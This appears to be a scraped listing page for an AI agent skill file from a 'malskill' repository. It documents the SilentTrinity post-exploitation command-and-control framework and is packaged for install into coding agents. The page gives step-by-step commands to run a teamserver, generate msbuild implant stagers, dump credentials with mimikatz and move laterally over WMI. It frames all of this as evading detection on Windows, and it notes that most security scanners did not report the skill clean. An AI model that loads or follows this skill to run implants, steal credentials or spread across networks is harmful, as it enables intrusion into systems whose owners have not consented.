offensive-tools/c2/silenttrinity/SKILL.md
Post-exploitation C2 framework using Boo-lang .NET implants with asynchronous communication. Use when targeting Windows environments needing CLR-based implants that bypass traditional PowerShell-based detections.
npx skillsauth add aeondave/malskill silenttrinityInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Asynchronous Python C2 with .NET (Boo) implants — evades PS-based detection.
pip install silenttrinity
# Start teamserver
st teamserver 0.0.0.0 password
# Connect client
st client wss://127.0.0.1:5000 password
# Create listener
listeners new http
listeners start http
# Generate stager
stagers list
stagers generate msbuild http
| Command | Purpose |
|---------|---------|
| sessions | Active implants |
| sessions interact <id> | Enter session |
| modules list | Available post-ex modules |
| modules use <name> | Load module |
| run | Execute loaded module against session |
| listeners | Manage C2 listeners |
| stagers | Generate implants |
Credential dumping:
modules use boo/credentials/mimikatz
run
Lateral movement via WMI:
modules use boo/lateral/invoke-wmi
set Target 192.168.1.50
run
| File | When to load |
|------|--------------|
| references/ | Stager formats and module list |
development
Auth/lab ref: Unicorn Engine CPU-only emulation for shellcode, decryptors, custom VM handlers, instruction tracing, memory hooks, and register-level experiments.
development
Auth/lab ref: Renode board and SoC simulation for MCU/RTOS firmware, UART/GPIO/peripheral modeling, GDB remote debugging, REPL platforms, and RESC scripts.
development
Auth/lab ref: Qiling OS-layer binary emulation for PE/ELF/Mach-O/UEFI/shellcode with rootfs, syscall/API hooks, filesystem mapping, and runtime patching.
databases
Auth/lab ref: QEMU user-mode and full-system emulation for cross-arch binaries, firmware, kernels, disks, serial consoles, networking, and GDB stubs.